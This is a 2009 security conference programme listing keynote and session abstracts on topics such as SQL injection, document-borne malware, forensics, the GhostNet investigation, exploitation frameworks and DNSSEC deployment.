Sessions - 2009

KeyNotes -

Keynote: The Frogs Who Desired A King: A Virtualization and Cloud Computing Security Fable Set To Interpretive Dance - Christofer Hoff

Aesop wrote a little ditty about some discontented frogs who lived in a pond. They asked Zeus for a new King. They got one. It ate them. The moral of this story is "be careful what you wish for as you might just get it." The corresponding analog is that of virtualization and cloud security. It's coming, but it's not going to look much like what security looks like today and it's certainly not what people are expecting. In fact, it may consume us all because we're unprepared for what we're asking for.

Keynote: Consumer Internet Identity. - Andrew Nash

Andrew Nash senior director of identity services, PayPal

Consumers have too many online identities - they must remember dozens of accounts and passwords, consumer Internet interactions are repetitive, frustrating and littered with outdated information. The scale of the problem is immense; hundreds of millions of Internet users interact with tens of millions of Internet Service Providers daily. We don't have a "network effect in action" for consumer identity, but we need one. The problem is not fundamentally about technology; consumer-managed Internet identity will depend on financial benefit for participants. Identity providers must also be a trusted "assertion provider" or "attribute broker" representing consumers. Andrew will talk about the issue and current and future solutions. He will also discuss the recent Gov 2.0 initiatives that the US Government is implementing using OpenId providers such as PayPal

Keynote: A day in the life of a hacker... - Adam Laurie (Major Malfunction)

When you check into a hotel room, do you see the elegantly understated, calm yet energising modern styling, providing you with the ultimate in traveller comfort, or is it the hotel safe, pay per view tv, automated minibar and RFID door lock that gets your attention? Is the ATM in the lobby a convenient place to collect some cash on the way to your meeting, or a technical challenge waiting to be undertaken? Do the twin turbochargers and double over head cams on you rental get your attention, or is it the RF enabled keyfob that has your motor running? Being a hacker in the modern world means never getting from A to B without something catching your eye and making you think, Batman style, "If I can... just.... reverse.... the polarity...".

Will Major Malfunction make it to the podium to deliver this talk, or will the temptations of e-passports, airline ticketing and in-flight entertainment systems prove too much on the way over? Watch this space...

Hacking the Privacy Legislation - Tracy Ann Kosa

In today's environment of particularly scarce resources, privacy can be easily buried under its sexier older sister - security. But the need to balance the two is an ongoing concern when it comes to any system that collects, uses and discloses personal information. This session will focus on exploring the differences between the two, and identifying what areas of the privacy legislation are mainly unenforced or unenforceable. In addition, it will identify what people, processes and technical requirements overlap and give you better bang for your compliance dollar.

The Past, Present & Future - SQL Injection - Jerry Mangiarelli

SQL Injection has brought a lot of awareness over the last few years, from the TJX / Heartland Payment Systems compromise to the mass SQL Injection attacks in 2008, that have continued to spill over into 2009. What was termed as an 'old school attack' has certainly demonstrated the ability to continue to be successful. As we move forward and begin to introduce interactive programming techniques like Flash and Ajax that reside on the client, one question must be asked, 'What's next for this old school attack?'

Portable Document Malware, the Office, and You - Get owned with it, can't do business without it - Seth Hardy

Many new types of malware, particularly targeted attacks against high-value targets, are using a very effective vector: common document formats such as Word, PowerPoint, and PDF. Unlike executables, businesses can't just block these ubiquitous file types. While there are ways to spot this kind of malware, many antivirus companies are lagging behind with generic detection, making AV evasion simpler than you'd be comfortable with.

We'll start with a high level overview of the file formats for Microsoft Office (Word, Excel, PowerPoint) and PDF, and see how they can be used to distribute malware. Then, we'll take a look at why these formats are difficult to scan using traditional (signature-based) antivirus techniques. Finally, we'll cover effective (heuristic-based, deep inspection) methods for spotting malware which attempts to hide in file formats which can't just be blocked.

Sniper Forensics - Changing the Landscape of Modern Forensics and Incident Response - Christopher E. Pogue

Live Analysis tools and techniques have exploded onto the incident response scene in the last two years. By gathering and reviewing volatile data and RAM dumps, incident responders can use time proven theories like, "Locard's Exchange Principle", "Occam's Razor", and "The Alexiou Principle" to target only the systems that are part of the breach. What used to take hours of analysis can now be done is minutes! What used to take weeks, can now take days!

By using sound logic and data reduction based on forensic evidence extracted from Live Analysis, incident responders can introduce accuracy and efficiency into their case work at a level not available through any other means. This is truly the cutting edge of modern computer forensics, and not something to be taken lightly! Don't miss the opportunity to learn tips, tools, and hear real world examples of how Live Analysis is literally changing the landscape of modern forensics!

Consumerization and Future State of Information Warfare - Robert "RSnake" Hansen

People crave constant communication, instant gratification, ease, and fun. But at what cost? What doors are we opening for an eventual potential for government sponsored espionage, terrorism or full scale war? How are consumers enabling or even participating in this effort? This speech will cover how individuals in a highly commercialized world can bring a nation state to the brink of civil/international war... or beyond.

The GhostNet Story - Nart Villeneuve

In March 2009 researchers at the University of Toronto uncovered a network of over 1200 compromised computers spread across 103 different countries. Nearly 30% of the infected hosts were identified as high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs. This presentation will detail the GhostNet investigation from the field work at Tibetan institutions in Dharamsala, India through to the discovery of the attackers' command and control interface and the aftermath including the victim notification process. Throughout the talk I will explore alternative explanations and address some of the misconceptions surrounding the GhostNet report.

Towards a more secure online banking ' moving beyond twenty questions. - Nick Owen

Online financial applications have developed in a seemingly haphazard way. The result is images for host authentication, hidden cookies and inane questions. The session will break down attacks against session, host/mutual authentication and transaction authentication, and suggest more secure methods of protecting against those attacks without excessive inconvenience to the user and lay the groundwork for additional security. We will present a multi-layered approach that authenticates the user's session, hardens the browser, strongly authenticates the server and can authenticate transactions without forcing the user to play 20 questions. Session themes will include keeping the user interface simple and consistent; the latest tools that could lead to new attack vectors, such as low-cost VoIP war-dialers; and where reliance on third-parties can create unintended consequences. For example, out-of-band authentication is becoming increasingly popular, but some rely on third-parties that protect their accounts using insecure means, negating the security benefits and increasing the likelihood of an attack on that third-party service. We will discuss the impact of this and how the divergent economic incentives of cell carriers impacts the security of SMS-based authentication systems.

Massively Scaled Security Solutions for Massively Scaled IT - Michael Smith

The US Federal Government is the world's largest consumer of IT products and, by extension, one of the largest consumers of IT security products and services. This talk covers some of the problems with security on such a massive scale; how and why some technical, operational, and managerial solutions are working or not working; and how these lessons can be applied to smaller-scale security environments.

Smashing the stats for fun and profit - Ben Sapiro

(or how to convince your boss to spend properly on security) We all know that security vulnerabilities need to be fixed but it can be hard to convince your employer that you deserve a budget so you can do your job properly.

Using research from the 2009 Canada wide security survey, we'll explore (FUD Free) the following topics:

* Do Canadian businesses think cloud services are secure?
* Do people still forget about application security?
* Which approaches work in getting the business to understand security issues?
* How much should your employer spend on security?

Malware Freakshow - Nicholas Percoco and Jibran Ilyas

In 2008 alone, we performed full forensic investigations on over 150 different environments ranging from financial institutions, hotels, restaurants and casinos. This presentation will show the inner workings of 4 very interesting pieces of malware, ranging from somewhat simple to very complex. Each sample was actually used to steal confidential data that resulted in significant fraud and business loss for the organizations we found them at. Many of the pieces of malware we have been running across are advanced pieces of software written by very skilled developers. The complexity in their propagation, control channels, and data exporting properties will be very interesting to anyone interested in this topic.

Weaponizing the Web: More attacks on User-Generated Content - Nathan Hamiel and Shawn Moyer

Ultimately, basing the value proposition of your site on user-generated and external content is a kind of variant on Russian Roulette, where in every turn the gun is pointed at your head, regardless of the number of players. You may win most of the time, but eventually a bullet is going to find its way into the chamber with your name on it.

We spent some time last year looking at this problem as it related specifically to Social Networks, but that left a lot of the territory unexplored (and plenty of other folks are looking at SocNets at this point). This time around we'll be talking about a previously unnoticed attack vector for lots and lots of web applications with user-generated content, and releasing a handy tool to exploit it.

Bundled in are some thoughts on Web 2.0 attack surface, a few new exploitation techniques, and as in last year, a hefty helping of lulz, ridicule, and demos-of-shame at the expense of a few of your and (our) favorite sites.

Nsploit: Popping boxes with Nmap - Ryan Linn

Tired of waiting on scans to complete so you can own boxes? Maybe we can help! Let the powerful scripting engine in Nmap and the sexy attack power of Metasploit combine to form Nsploit, a framework for launching Metasploit exploits from Nmap. Nmap is supporting more vulnerability detection out of the box. Nsploit leverages that power and takes it one step forward, allowing vulnerability triggers to initiate Metasploit exploits. This talk will show you how the framework works and how exploit developers can leverage this framework to create their own vulnerability triggers.

Cain BeEF Hash: Snagging passwords without popping boxes - Ryan Linn

Chaining exploits and abusing trust are two heavily discussed topics in security today. If you ever deal with Windows domains come see what tools and techniques can be used to quietly liberate hashes even if the workstations are patched. This presentation will go in depth into what tools can facilitate turning acquired credentials into usable passwords quickly. Once the demonstrations are finished, there will be explanations of techniques and policies that can be used to mitigate and reduce the impact of these types of attacks.

Game Over, Man: Gamers Under Fire - Chris Boyd

An exploration of security issues relating to consoles and their risks to both home users and the business environment. This will include issues such as custom built DDoS tools, social engineering of Microsoft support staff, account theft, the risk to businesses and personal tips to keep your own details secure. I will also examine the trade of stolen Xbox accounts in return for credit cards, how the rewards that companies give gamers make them targets because of the inadequate privacy features and how free programs allow hackers to exploit profanity filters, paid content and even the profiles themselves.

When Web 2.0 Attacks - Understanding AJAX, Flash and "Highly Interactive" Technologies - Rafal Los

This talk covers the problems that are emerging with Web 2.0 technologies, why they are issues and what can be done. Specifically diving into the approach for analyzing AJAX and Flash! Applications using some commercial and open-source tools this talk is part informative, part educational, and all practical. Conference attendees love to have something to take back to their management and teams to show that they've learned something 'this talk provides exactly that.

Your Mind: Legal Status, Rights and Securing Yourself - James Arlen and Tiffany Strauchs Rad

As a participant in the information economy, you no longer exclusively own material originating from your organic brain; you leave a digital trail with your portable device'''s transmitted communications and when your image is captured by surveillance cameras. Likewise, if you Tweet or blog, you have outsourced a large portion of your memory and some of your active cognition to inorganic systems. U.S. and International laws relating to protection of intellectual property and criminal search and seizure procedures puts into question protections of these ephemeral communications and memoranda stored on your personal computing devices, in cloud computing networks, on off-shore "subpoena proof" server/jurisdiction-hopping platforms, or on social networking sites. Although once considered to be futuristic technologies, as we move our ideas and memories onto external devices or are subjected to public surveillance with technology (Future Attribute Screening Technology) that assesses pre-crime thoughts by remotely measuring biometric data such as heart rate, body temperature, pheromone responses, and respiration, where do our personal privacy rights to our thoughts end and, instead, become public expressions with lesser legal protections? Similarly, at what state does data in-transit or stored in implantable medical devices continuously connected to the Internet become searchable? In a society in which there is little differentiation remaining between self/computer, thoughts/stored memoranda, and international boundaries, a technology lawyer/computer science professor and a security professional will recommend propositions to protect your data and yourself.

Crimeware: Web Exploitation Kits Revealed - Roy Firestein

The session introduces the attendee to how crimeware has become increasingly popular in recent years, the indistinguishable similarities with legitimate business and the dangers the internet community is facing. There will also be a live demonstration of the infamous Mpack (or other similar kit), including a minor exercise encouraging one to identify methods to mitigate or detect such scenarios.

To cache a thief | Using database caches to detect SQL Injection attacks - Kevvie Fowler

Most SQL Injection attack detection methods are heavily dependent on IDS and web server logging which in many scenarios can be easily circumvented. Performing SQL Injection attack detection at the database can overcome current detection limitations. This session will demonstrate techniques and a new incident response tool that uses database caches to confirm or discount the occurrence of a successful SQL injection attack including:

• attacks unveiled at this year's Black Hat Europe conference


• attacks launched from the tool used to compromise the website of a major anti-virus vendor earlier this year


• the attack used by the SQL Injection worm that compromised over 500,000 websites in 2008

SSLFail.com - Jay Graver, Tyler Reguly and Mike Zusman

SSLFail.com brings together Security Enthusiasts who research all things SSL/TLS. Secure Sockets Layer and Transport Layer Security are an essential part of today's Internet and they are very poorly understood by most Users and unfortunately many Administrators. There have been a number of very important developments in the area of SSL in the past year. The user's security experience has completely changed while at the same time the Certificate Authorities have invented new products to revitalize their profits. There are dozens of ways that SSL can go horribly wrong for both the users and the administrators of today's Internet.

The panel will discuss their latest areas of SSL research, explain the current (and newly released) attacks on SSL and the steps that Administrators and Users can do to protect themselves. Questions from the audience will be welcome as this is an interactive panel discussion.

Retaliation: Breaking Attack Vectors in the Infrastructure - Jennifer Jabbusch

2010 will be the beginnings of a new world of network and infrastructure security as new IEEE standards change the landscape of threat models for wired, wireless and wide area networks. Learn how to use these features to stop spoofing, eavesdropping and a host of malicious activity. I'll give you the knowledge and tools to fight back, secure the network, thwart attackers, prevent data leakage and more. Among other things, this session covers the new MACSec encryption, key exchange, network advertisements and unique device identity (IEEE 802.1X-REV, 802.1AE, .1af, 1AR).

w3af - A framework to own the web - Andr's Riancho

Specially crafted for SecTor's attendees, the w3af project leader will deliver a double talk about the framework, which will guide you through its features using a demos and real life examples.

The first session introduces w3af to the audience and shows all of the automated Web application scanning features, and follows up with a detailed description of the advanced exploitation features present in the framework. A must-see talk if you're a penetration tester wanting to learn new tricks.

The second session starts with an introduction to the new tools that have been integrated into w3af's GUI to help Web application Penetration Testers, and ends up with a comparison between four commercial and open source Web application scanners. This analysis includes the different ways in which HTTP fuzzers and HTML parsers work in each scanner.

While we recommend you to attend both sessions, it is possible to attend the second session without attending the first one.

Deblaze - A remote method enumeration tool for flex servers - Jon Rose

Flash has traditionally been a graphics heavy technology used to create artistic user interfaces that runs on a client's browser. The evolution of Flash was pushed by application developers who wanted to access complex business logic and functionality on remote servers. Through the use of the Flex programming model and the ActionScript language, Flash Remoting was born. Now Flash applications can make request to a remote server to call server side functions, such as looking up accounts, retrieving additional data and graphics, and performing complex business operations. However, the ability to call remote methods also increases the attack surface exposed by these applications. This talk will describe how Flash remoting works, the technologies that implement it, and the potential security problems related to flash remoting. A proof of concept tool, deblaze, will demonstrate how these remote methods can be attacked. Currently, there are no publically available tools that are able to perform method enumeration and interrogation from a zero knowledge perspective.

DNSSEC deployment in Canada - Paul Wouters, Norm Ritchie

The Kaminsky bug, announced at Black Hat last year, sent everyone scrambling to update their DNS infrastructure. But most people stopped after the patchwork. Over 10 TLDs, including .gov are already deployed using DNSSEC. CIRA has launched a "friends & family" test program for those who want to test DNSSEC with .ca domains (and should be in full production at the time of SecTor) Why are you not using the added security provided by DNSSEC?

This presentation will show you how to take advantage of DNSSEC within minutes. It will show you how to do the minimum to protect your .ca domain against cache poisoning. And for those who only care about their .com domain, DNSSEC Lookaside Verification will be demonstrated.

The presentation will include a live demo configuring DNSSEC on a stock Windows and Linux machine and a demo deploying DNSSEC on a .ca domain.